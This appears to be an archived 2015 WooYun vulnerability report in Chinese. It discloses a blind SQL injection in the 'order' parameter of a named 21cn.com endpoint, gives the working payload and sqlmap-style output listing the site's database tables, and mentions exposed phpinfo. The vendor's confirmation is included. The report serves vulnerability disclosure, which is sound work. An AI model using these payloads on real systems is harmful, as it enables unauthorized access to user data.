破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

世纪龙某站SQL注射&phpinfo信息泄露

编号112923
Urlhttp://www.wooyun.org/bug.php?action=view&id=112923
漏洞状态厂商已经确认
漏洞标题世纪龙某站SQL注射&phpinfo信息泄露
漏洞类型SQL注射漏洞
厂商世纪龙信息网络有限责任公司
白帽子路人甲
提交日期2015-05-11 10:01:00
公开日期2015-06-25 11:10:00
修复时间(not set)
确认时间2015-05-11 00:00:00
Confirm Spend0
漏洞标签管理后台对外 Mysql 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
233
漏洞细节

http://ts.21cn.com:80/home/morepost (POST)
order=1&pages=0
参数:order
payload
order=1%2c(select%20case%20when%20(3*2*1%3d6%20AND%20000776%3d000776)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)%3d1

POC

Parameter: order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: order=(SELECT (CASE WHEN (1056=1056) THEN 1056 ELSE 1056*(SELECT 1056 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pages=0
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 73834 |
| iic_reply | 43953 |
| iic_digg | 41251 |
| iic_log | 32647 |
| iic_post_sync | 15150 |
| iic_user_addres | 14712 |
| iic_digg_20131224 | 13041 |
| iic_post | 12630 |
| iic_post_com | 8575 |
| iic_reply_sync | 6180 |
| iic_area | 3407 |
| iic_collective_digg | 1831 |
| iic_access | 917 |
| iic_com | 753 |
| iic_recom | 641 |
| iic_collective_reply | 591 |
| iic_case | 586 |
| iic_merchant | 350 |
| iic_node | 271 |
| iic_captcha | 226 |
| iic_ipadmin | 96 |
| iic_feedback | 93 |
| iic_movice | 87 |
| iic_redblackdigg | 73 |
| iic_collective | 70 |
| iic_postkeyword | 66 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_hotpost | 42 |
| iic_role_account | 39 |
| iic_team | 37 |
| iic_collectivenews | 33 |
| iic_wxuser | 32 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 24 |
| iic_redblacklist | 24 |
| iic_article | 13 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_keyword | 7 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_post_dealwith_satisfaction | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+


phpinfo
还开启了危险模式。。。

s20150508174033.png

修复方案

~~

状态信息 2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开
厂商回复感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢。
回应信息危害等级:高漏洞Rank:15 确认时间:2015-05-11 11:09